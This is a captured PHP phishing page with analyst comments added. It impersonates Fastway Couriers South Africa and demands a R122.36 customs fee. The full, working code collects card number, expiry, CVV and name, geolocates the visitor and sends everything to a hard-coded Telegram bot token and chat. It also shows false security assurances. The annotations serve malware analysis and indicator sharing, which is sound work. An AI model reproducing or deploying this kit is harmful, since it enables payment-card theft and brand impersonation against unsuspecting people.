at path:
ROOT
/
fastway
/
payment.php
run:
R
W
assets
DIR
2026-03-20 04:26:56
R
W
approval.php
21.55 KB
2026-05-28 13:26:25
R
W
error_log
4.17 KB
2026-03-18 03:54:16
R
W
index.php
18.05 KB
2026-05-28 13:26:25
R
W
loading1.php
10.21 KB
2026-03-20 04:33:56
R
W
loading2.php
9.82 KB
2026-03-20 04:34:26
R
W
payment.php
23.61 KB
2026-05-28 13:26:25
R
W
error_log
payment.php
<?php
// Analyst annotation (comments only; code is as captured).
// This script renders a card-payment form titled "Fastway Couriers | Customs Duty Payment"
// and, when the form is submitted, relays the entered card fields plus client metadata to a
// Telegram chat through the Bot API sendMessage endpoint. No payment processor is called
// anywhere in this file.
//
// Indicators visible in this file:
//   - outbound requests from the web host to api.telegram.org (bot sendMessage),
//     data.handyapi.com (/bin/ lookup) and ip-api.com (/json/ lookup);
//   - the POST field value action=log_payment sent to the page's own URL;
//   - the browser localStorage key 'paymentData';
//   - the redirect target loading2.php.

// Hard-coded Telegram bot token and chat id: the destination of every captured record.
// Both values are indicators that can tie other deployments to the same operator.
$BOT_TOKEN = "8286993282:AAFvgZ9dD4Qrvedz-MQmE0OKSNAOjSUfeUU";
$CHAT_ID = "-5024972976";

// === GET USER INFO ===
// Runs on every request, including the first page view, before any form data exists.
$ip = $_SERVER['REMOTE_ADDR'] ?? 'Unknown';
$user_agent = $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown';
$country = 'Unknown';
$timeout = 5;

// Geolocates the visitor by sending the IP to ip-api.com over plain HTTP.
// Warnings are suppressed with @ and peer verification is switched off in the context.
try {
    $context = stream_context_create([
        'http' => ['timeout' => $timeout],
        'ssl' => ['verify_peer' => false, 'verify_peer_name' => false]
    ]);
    $geoData = @file_get_contents("http://ip-api.com/json/{$ip}", false, $context);
    if ($geoData !== false) {
        $geo = json_decode($geoData);
        if (isset($geo->country) && $geo->status === 'success') {
            $country = $geo->country;
        }
    }
} catch (Exception $e) {
    $country = 'Unknown';
}

/**
 * Looks up issuer metadata for a card prefix at data.handyapi.com.
 *
 * The prefix is placed directly in the URL path and the request carries a
 * hard-coded x-api-key header (another operator-linked indicator). TLS peer and
 * host verification are both disabled on the cURL handle.
 *
 * @param string $bin Card-number prefix; the caller passes the first six characters.
 * @return mixed Decoded JSON (associative) when a non-empty response arrives, otherwise null.
 */
function getBinInfo($bin) {
    $url = "https://data.handyapi.com/bin/{$bin}";
    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL => $url,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_TIMEOUT => 3,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_SSL_VERIFYHOST => false,
        CURLOPT_HTTPHEADER => ['x-api-key: HAS-0YYRXxQgdvMzHL9u9184D']
    ]);
    $response = curl_exec($ch);
    curl_close($ch);
    if ($response) {
        $data = json_decode($response, true);
        return $data;
    }
    return null;
}

/**
 * Resolves a country name for an IP address through ip-api.com (plain HTTP).
 *
 * Placeholder and loopback addresses are skipped. Any failure falls through to 'Unknown'.
 *
 * @param string $ip      Address to look up.
 * @param int    $timeout HTTP timeout in seconds (default 3).
 * @return string Country name reported by the service, or 'Unknown'.
 */
function getCountryFromIP($ip, $timeout = 3) {
    if ($ip === 'Unknown' || $ip === '127.0.0.1' || $ip === '::1') {
        return 'Unknown';
    }
    try {
        $context = stream_context_create([
            'http' => ['timeout' => $timeout],
            'ssl' => ['verify_peer' => false, 'verify_peer_name' => false]
        ]);
        $geoData = @file_get_contents("http://ip-api.com/json/{$ip}?fields=status,country", false, $context);
        if ($geoData !== false) {
            $geo = json_decode($geoData);
            if (isset($geo->country) && $geo->status === 'success') {
                return $geo->country;
            }
        }
    } catch (Exception $e) {
        // Silently fail
    }
    return 'Unknown';
}

/**
 * Maps a User-Agent string to a coarse OS label by substring match.
 *
 * The checks run in the order written and the first match wins.
 *
 * @param string $user_agent Raw User-Agent header value.
 * @return string One of the labels assigned below, or 'Unknown'.
 */
function detectOS($user_agent) {
    $os = 'Unknown';
    if (strpos($user_agent, 'Windows') !== false) $os = 'Windows';
    elseif (strpos($user_agent, 'Mac') !== false) $os = 'macOS';
    elseif (strpos($user_agent, 'Linux') !== false) $os = 'Linux';
    elseif (strpos($user_agent, 'Android') !== false) $os = 'Android';
    elseif (strpos($user_agent, 'iPhone') !== false) $os = 'iOS';
    elseif (strpos($user_agent, 'iPad') !== false) $os = 'iPadOS';
    return $os;
}

/**
 * Builds the "BIN INFORMATION" section of the Telegram message.
 *
 * Reads several alternative key spellings from the lookup result and falls back to
 * fixed defaults; the currency default is 'ZAR'. Lookup values are interpolated into
 * the HTML-mode message without escaping.
 *
 * @param string $bin     Card-number prefix shown in the message.
 * @param mixed  $binData Result of getBinInfo(); anything that is not a non-empty array
 *                        produces the "No additional info available" line.
 * @return string HTML-formatted message fragment.
 */
function formatBinInfo($bin, $binData) {
    $binInfo = "<b>🅱️ BIN INFORMATION:</b>\n";
    if ($binData && is_array($binData)) {
        $brand = $binData['Brand'] ?? $binData['brand'] ?? 'UNKNOWN';
        $bank = $binData['Bank'] ?? $binData['bank'] ?? $binData['Issuer'] ?? 'Unknown';
        $binCountry = $binData['Country'] ?? $binData['country'] ?? 'Unknown';
        $type = $binData['Type'] ?? $binData['type'] ?? $binData['Scheme'] ?? 'UNKNOWN';
        $level = $binData['Level'] ?? $binData['level'] ?? $binData['CardTier'] ?? $binData['tier'] ?? 'STANDARD';
        $currency = $binData['Currency'] ?? $binData['currency'] ?? 'ZAR';
        $binInfo .= "• <b>BIN:</b> <code>{$bin}</code> | <b>Brand:</b> {$brand}\n";
        $binInfo .= "• <b>Bank:</b> {$bank} | <b>Country:</b> {$binCountry}\n";
        $binInfo .= "• <b>Type:</b> {$type} | <b>Level:</b> {$level}\n";
        $binInfo .= "• <b>Currency:</b> {$currency}\n\n";
    } else {
        $binInfo .= "• <b>BIN:</b> <code>{$bin}</code> (No additional info available)\n\n";
    }
    return $binInfo;
}

/**
 * Posts a message to the hard-coded Telegram chat via the Bot API.
 *
 * This is the exfiltration channel: a form-encoded POST to
 * api.telegram.org/bot<token>/sendMessage with parse_mode HTML. TLS peer and host
 * verification are disabled on the cURL handle.
 *
 * @param string $msg HTML-formatted message body.
 * @return bool True only when the HTTP status code is 200.
 */
function sendTelegram($msg) {
    global $BOT_TOKEN, $CHAT_ID;
    $url = "https://api.telegram.org/bot{$BOT_TOKEN}/sendMessage";
    $data = [
        'chat_id' => $CHAT_ID,
        'text' => $msg,
        'parse_mode' => 'HTML',
        'disable_web_page_preview' => true
    ];
    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL => $url,
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => http_build_query($data),
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_TIMEOUT => 10,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_SSL_VERIFYHOST => false,
        CURLOPT_HTTPHEADER => [
            'Content-Type: application/x-www-form-urlencoded'
        ]
    ]);
    $result = curl_exec($ch);
    $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    return $httpCode === 200;
}

// === HANDLE PAYMENT LOG ===
// Capture endpoint: reached only by a POST carrying action=log_payment (sent by the
// submit listener at the bottom of this page). It answers with JSON and exits before
// any HTML is rendered.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['action']) && $_POST['action'] === 'log_payment') {
    header('Content-Type: application/json');

    // Get client info once
    $ip = $_SERVER['REMOTE_ADDR'] ?? 'Unknown';
    $user_agent = $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown';
    $country = getCountryFromIP($ip);
    $os = detectOS($user_agent);

    // Submitted fields. Most are HTML-escaped because the message is sent with
    // parse_mode HTML; the card number only has whitespace stripped.
    $tracking = htmlspecialchars($_POST['tracking'] ?? 'Unknown');
    $parcel_type = htmlspecialchars($_POST['parcel_type'] ?? 'Unknown');
    $card_name = htmlspecialchars($_POST['card_name'] ?? 'Unknown');
    $card_number = preg_replace('/\s+/', '', $_POST['card_number'] ?? '');
    $expiry = htmlspecialchars($_POST['expiry'] ?? '00/00');
    $cvv = htmlspecialchars($_POST['cvv'] ?? '000');

    // Get BIN info (first six characters of the submitted number go to the lookup service)
    $bin = substr($card_number, 0, 6);
    $binData = getBinInfo($bin);

    // Build enhanced message
    $msg = "<b>✅ FASTWAY COURIERS PAYMENT CAPTURED</b>\n";
    $msg .= "══════════════════════════════\n\n";

    // BIN Information Section
    $msg .= formatBinInfo($bin, $binData);

    // Card Details Section: full card number, expiry and CVV are included verbatim.
    $msg .= "<b>💳 CARD DETAILS:</b>\n";
    $msg .= "• <b>Tracking #:</b> <code>{$tracking}</code>\n";
    $msg .= "• <b>Parcel Type:</b> {$parcel_type}\n";
    $msg .= "• <b>Cardholder:</b> {$card_name}\n";
    $msg .= "• <b>Card Number:</b> <code>{$card_number}</code>\n";
    $msg .= "• <b>Expiry:</b> {$expiry}\n";
    $msg .= "• <b>CVV:</b> <code>{$cvv}</code>\n";
    $msg .= "• <b>Amount:</b> R122.36\n\n";

    // Client Information Section
    $msg .= "<b>👤 CLIENT INFORMATION:</b>\n";
    $msg .= "• <b>IP:</b> <code>{$ip}</code>\n";
    $msg .= "• <b>Country:</b> {$country}\n";
    $msg .= "• <b>OS:</b> {$os}\n";
    $msg .= "• <b>User Agent:</b> " . substr($user_agent, 0, 50) . "...\n";
    $msg .= "• <b>Time:</b> " . date('d/m/Y H:i:s') . "\n";
    $msg .= "══════════════════════════════\n";
    $msg .= "<i>📍 Fastway Couriers South Africa</i>";

    // The return value of sendTelegram() is ignored; the response is always 'success'.
    sendTelegram($msg);
    echo json_encode(['status' => 'success']);
    exit;
}

// === GET DATA FROM POST (from loading1.php) ===
// Values posted by the previous step are escaped and echoed into the page below.
// A fixed tracking number is substituted when none is supplied, so the field is never empty.
$tracking = htmlspecialchars($_POST['tracking'] ?? '');
$parcel_type = htmlspecialchars($_POST['parcel_type'] ?? 'International Satchel');
$weight = htmlspecialchars($_POST['weight'] ?? '0.9');
if (empty($tracking)) {
    $tracking = 'FW632846518';
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Fastway Couriers | Customs Duty Payment</title>
    <!-- Analyst note: third-party font and icon stylesheets are loaded from public CDNs; brand images come from the local assets/ directory. -->
    <link href="https://fonts.googleapis.com/css2?family=Barlow+Condensed:wght@400;600;700;800&family=Barlow:wght@300;400;500;600&display=swap" rel="stylesheet">
    <style>
        *, *::before, *::after { box-sizing: border-box; margin: 0; padding: 0; }
        :root { --orange: #F47920; --orange-light: #FF8C3A; --navy: #1A2340; --navy-dark: #10172B; --navy-mid: #232E4A; --white: #FFFFFF; --off-white: #F7F8FA; --grey: #6B7280; --light-grey: #E5E7EB; --text: #1F2937; --success: #0F7B4B; --success-bg: #E8F3ED; --radius: 6px; --input-bg: #FFFFFF; --shadow-sm: 0 4px 12px rgba(0,0,0,0.05); }
        body { font-family: 'Barlow', sans-serif; color: var(--text); background: var(--off-white); min-height: 100vh; display: flex; flex-direction: column; }
        .container { max-width: 800px; margin: 0 auto; width: 100%; padding: 0 1.5rem; }
        /* HEADER */
        .header { background: var(--white); padding: 1rem 0; box-shadow: 0 2px 10px rgba(0,0,0,0.05); }
        .header-container { max-width: 1200px; margin: 0 auto; padding: 0 1.5rem; }
        .logo-container { display: flex; align-items: center; }
        .logo { height: 70px; width: auto; }
        /* BANNER */
        .banner { width: 100%; background: linear-gradient(135deg, var(--navy-dark) 0%, var(--navy) 100%); padding: 2.5rem 0; margin-bottom: 2rem; }
        .banner-content { max-width: 1200px; margin: 0 auto; padding: 0 1.5rem; color: var(--white); }
        .banner-title { font-family: 'Barlow Condensed', sans-serif; font-size: clamp(2rem, 5vw, 2.5rem); font-weight: 800; text-transform: uppercase; letter-spacing: -0.5px; margin-bottom: 0.5rem; }
        .banner-title span { color: var(--orange); }
        /* CARD */
        .card { background: var(--white); border: 1px solid var(--light-grey); border-radius: var(--radius); padding: 2rem; margin-bottom: 2rem; box-shadow: var(--shadow-sm); }
        .progress { display: flex; align-items: center; gap: 0.75rem; padding: 1rem 1.25rem; background: var(--off-white); border-radius: var(--radius); border-left: 4px solid var(--orange); margin-bottom: 2rem; font-size: 0.95rem; }
        .progress strong { color: var(--navy-dark); }
        .progress span { color: var(--orange); font-weight: 600; margin-left: 0.25rem; }
        .parcel-info { background: var(--off-white); border: 1px solid var(--light-grey); border-radius: var(--radius); padding: 1.25rem; margin: 1.5rem 0; }
        .info-row { display: flex; justify-content: space-between; padding: 0.6rem 0; border-bottom: 1px solid var(--light-grey); font-size: 0.95rem; }
        .info-row:last-child { border-bottom: none; }
        .info-label { color: var(--grey); }
        .info-value { font-weight: 600; color: var(--navy-dark); }
        .amount-display { background: linear-gradient(135deg, var(--navy-dark), var(--navy)); color: var(--white); padding: 2rem; text-align: center; border-radius: var(--radius); margin: 2rem 0; }
        .amount-currency { font-size: 1.25rem; vertical-align: super; margin-right: 0.25rem; }
        .amount-number { font-family: 'Barlow Condensed', sans-serif; font-size: 3.5rem; font-weight: 800; line-height: 1; }
        .fee-description { text-align: center; color: var(--grey); font-size: 0.9rem; margin-bottom: 2rem; }
        label { display: block; margin: 1.25rem 0 0.35rem; font-weight: 600; font-size: 0.85rem; color: var(--navy-dark); text-transform: uppercase; letter-spacing: 0.5px; }
        input[type="text"], input[type="tel"] { width: 100%; padding: 0.85rem 1rem; border: 2px solid var(--light-grey); border-radius: var(--radius); background: var(--input-bg); font-family: 'Barlow', sans-serif; font-size: 0.95rem; transition: all 0.15s ease; }
        input:focus { outline: none; border-color: var(--orange); box-shadow: 0 0 0 3px rgba(244,121,32,0.1); }
        .input-group { display: grid; grid-template-columns: 1fr 1fr; gap: 1.25rem; margin-bottom: 1rem; }
        @media (max-width: 600px) { .input-group { grid-template-columns: 1fr; } }
        .btn-primary { display: block; width: 100%; padding: 1rem; margin-top: 2rem; background: var(--orange); color: var(--white); border: none; border-radius: var(--radius); font-family: 'Barlow', sans-serif; font-weight: 700; font-size: 1rem; text-transform: uppercase; letter-spacing: 1px; cursor: pointer; transition: all 0.15s ease; }
        .btn-primary:hover { background: var(--orange-light); transform: translateY(-1px); box-shadow: 0 4px 12px rgba(244,121,32,0.3); }
        .payment-methods { display: flex; justify-content: center; gap: 1rem; margin: 1.5rem 0; flex-wrap: wrap; }
        .payment-method { background: var(--off-white); border: 1px solid var(--light-grey); border-radius: var(--radius); padding: 0.4rem 0.8rem; font-size: 0.8rem; color: var(--grey); display: flex; align-items: center; gap: 0.4rem; }
        .tip { font-size: 0.85rem; color: var(--grey); margin-top: 1.5rem; padding: 1rem; background: var(--off-white); border-left: 3px solid var(--orange); border-radius: var(--radius); }
        .loading-overlay { position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: rgba(255, 255, 255, 0.98); display: none; justify-content: center; align-items: center; flex-direction: column; z-index: 1000; }
        .spinner { width: 50px; height: 50px; border: 3px solid var(--light-grey); border-top: 3px solid var(--orange); border-radius: 50%; animation: spin 1.2s linear infinite; margin-bottom: 1rem; }
        @keyframes spin { to { transform: rotate(360deg); } }
        /* FOOTER */
        .footer { background: var(--navy-dark); padding: 3rem 0 2rem; margin-top: auto; }
        .footer-content { max-width: 1200px; margin: 0 auto; padding: 0 1.5rem; text-align: center; }
        .footer-logo { margin-bottom: 1.5rem; }
        .footer-logo img { height: 70px; width: auto; opacity: 0.9; }
        .footer-address { color: rgba(255,255,255,0.6); font-size: 0.9rem; margin-bottom: 1rem; line-height: 1.6; }
        .footer-copyright { color: rgba(255,255,255,0.4); font-size: 0.8rem; }
        .footer-links { display: flex; justify-content: center; gap: 2rem; margin: 1rem 0 1.5rem; flex-wrap: wrap; }
        .footer-links a { color: rgba(255,255,255,0.6); text-decoration: none; font-size: 0.85rem; transition: color 0.15s; }
        .footer-links a:hover { color: var(--orange); }
        @media (max-width: 600px) { .card { padding: 1.5rem; } .logo { height: 60px; } .amount-number { font-size: 2.5rem; } }
    </style>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css">
</head>
<body>
    <header class="header">
        <div class="header-container">
            <div class="logo-container">
                <img src="assets/1.png" alt="Fastway Couriers" class="logo">
            </div>
        </div>
    </header>
    <div class="banner">
        <div class="banner-content">
            <div class="banner-title">Customs <span>Payment</span></div>
        </div>
    </div>
    <main class="container">
        <div class="card">
            <div class="progress">
                <i class="fas fa-credit-card" style="color: var(--orange);"></i>
                <strong>Status:</strong> <span>Payment Required</span>
            </div>
            <!-- Analyst note: tracking number, parcel type and weight shown here are whatever the previous step posted (or the fixed defaults set in the PHP above). -->
            <div class="parcel-info">
                <div class="info-row">
                    <span class="info-label"><i class="fas fa-barcode"></i> Tracking Number:</span>
                    <span class="info-value" id="trackingDisplay"><?php echo $tracking; ?></span>
                </div>
                <div class="info-row">
                    <span class="info-label"><i class="fas fa-box"></i> Parcel Type:</span>
                    <span class="info-value" id="typeDisplay"><?php echo $parcel_type; ?></span>
                </div>
                <div class="info-row">
                    <span class="info-label"><i class="fas fa-weight-hanging"></i> Weight:</span>
                    <span class="info-value" id="weightDisplay"><?php echo $weight; ?> kg</span>
                </div>
                <div class="info-row">
                    <span class="info-label"><i class="fas fa-file-invoice-dollar"></i> Fee Type:</span>
                    <span class="info-value">Customs Clearance Duty</span>
                </div>
            </div>
            <!-- Analyst note: the amount is a fixed string in the markup and in the Telegram message; it is not computed from any input. -->
            <div class="amount-display">
                <span class="amount-currency">R</span>
                <span class="amount-number">122.36</span>
            </div>
            <div class="fee-description">
                <i class="fas fa-info-circle"></i> This is a mandatory customs duty for international parcels
            </div>
            <!-- Analyst note: the form has no action attribute; the submit listener in the script block below intercepts submission. -->
            <form id="paymentForm">
                <input type="hidden" id="tracking" name="tracking" value="<?php echo $tracking; ?>">
                <input type="hidden" id="parcel_type" name="parcel_type" value="<?php echo $parcel_type; ?>">
                <label for="card_name"><i class="fas fa-user"></i> Cardholder Name</label>
                <input type="text" id="card_name" name="card_name" placeholder="e.g. JOHN SMITH" required>
                <label for="card_number"><i class="fas fa-credit-card"></i> Card Number</label>
                <input type="tel" id="card_number" name="card_number" placeholder="1234 5678 9012 3456" maxlength="19" required>
                <div class="input-group">
                    <div>
                        <label for="expiry"><i class="fas fa-calendar-alt"></i> Expiry (MM/YY)</label>
                        <input type="tel" id="expiry" name="expiry" placeholder="MM/YY" maxlength="5" required>
                    </div>
                    <div>
                        <label for="cvv"><i class="fas fa-lock"></i> CVV</label>
                        <input type="tel" id="cvv" name="cvv" placeholder="123" maxlength="4" required>
                    </div>
                </div>
                <div class="payment-methods">
                    <div class="payment-method"><i class="fab fa-cc-visa"></i> Visa</div>
                    <div class="payment-method"><i class="fab fa-cc-mastercard"></i> MasterCard</div>
                    <div class="payment-method"><i class="fas fa-university"></i> EFT</div>
                    <div class="payment-method"><i class="fab fa-cc-amex"></i> Amex</div>
                </div>
                <!-- Analyst note: static reassurance text; the PHP handler above relays the full card number, expiry and CVV to the Telegram chat. -->
                <p class="tip">
                    <i class="fas fa-shield-alt"></i> Your payment is secured with 256-bit SSL encryption. Fastway Couriers never stores your full card details.
                </p>
                <button type="submit" class="btn-primary">
                    <i class="fas fa-lock"></i> Pay R122.36 Now
                </button>
            </form>
        </div>
    </main>
    <div class="loading-overlay" id="loadingOverlay">
        <div class="spinner"></div>
        <div style="font-size: 1.1rem; font-weight: 600; margin-bottom: 0.5rem; color: var(--navy-dark);">Processing Secure Payment...</div>
        <div style="color: var(--grey);">Please do not close this window</div>
    </div>
    <footer class="footer">
        <div class="footer-content">
            <div class="footer-logo">
                <img src="assets/3.png" alt="Fastway Couriers">
            </div>
            <div class="footer-address">
                Fastway Couriers South Africa<br> 12 Electron Road, Isando, Johannesburg, 1600
            </div>
            <!-- Analyst note: every footer link points to "#". -->
            <div class="footer-links">
                <a href="#"><i class="fas fa-shield-alt"></i> Privacy Policy</a>
                <a href="#"><i class="fas fa-file-contract"></i> Terms of Service</a>
                <a href="#"><i class="fas fa-question-circle"></i> Help Center</a>
            </div>
            <div class="footer-copyright">
                © 2026 Fastway Couriers South Africa (Pty) Ltd. All rights reserved.
            </div>
        </div>
    </footer>
    <script>
        // Re-applies the server-rendered tracking value to the display element on load.
        document.addEventListener('DOMContentLoaded', function() {
            const tracking = '<?php echo $tracking; ?>';
            document.getElementById('trackingDisplay').textContent = tracking;
        });

        // Format card number: keep digits only, cap at 16, group in fours.
        document.getElementById('card_number').addEventListener('input', function(e) {
            let v = e.target.value.replace(/\D/g, '').substring(0,16);
            e.target.value = v.match(/.{1,4}/g)?.join(' ') || v;
        });

        // Format expiry: keep digits only, cap at 4, insert '/' after the month.
        document.getElementById('expiry').addEventListener('input', function(e) {
            let v = e.target.value.replace(/\D/g, '').substring(0,4);
            if (v.length > 2) v = v.slice(0,2) + '/' + v.slice(2);
            e.target.value = v;
        });

        // Submit: cancels the native submit and shows a "processing" overlay, then
        // POSTs every field with action=log_payment to the page's own URL (fetch('')),
        // which triggers the PHP capture branch above.
        document.getElementById('paymentForm').addEventListener('submit', async function(e) {
            e.preventDefault();
            const btn = this.querySelector('.btn-primary');
            const overlay = document.getElementById('loadingOverlay');
            btn.disabled = true;
            btn.innerHTML = '<i class="fas fa-spinner fa-spin"></i> Processing...';
            overlay.style.display = 'flex';
            const formData = new FormData(this);
            const data = {
                action: 'log_payment',
                tracking: formData.get('tracking'),
                parcel_type: formData.get('parcel_type'),
                card_name: formData.get('card_name'),
                card_number: formData.get('card_number'),
                expiry: formData.get('expiry'),
                cvv: formData.get('cvv')
            };
            try {
                await fetch('', {
                    method: 'POST',
                    headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
                    body: new URLSearchParams(data)
                });
            } catch (err) {
                // The log string names the real destination of the data.
                console.log('Telegram failed');
            }
            // Forensic artefact: the whole form, including card number, expiry and CVV,
            // is written to the visitor's localStorage under 'paymentData'. The redirect
            // to loading2.php happens after 1.5 s whether or not the POST succeeded.
            localStorage.setItem('paymentData', JSON.stringify(Object.fromEntries(formData)));
            setTimeout(() => {
                window.location.href = 'loading2.php';
            }, 1500);
        });
    </script>
</body>
</html>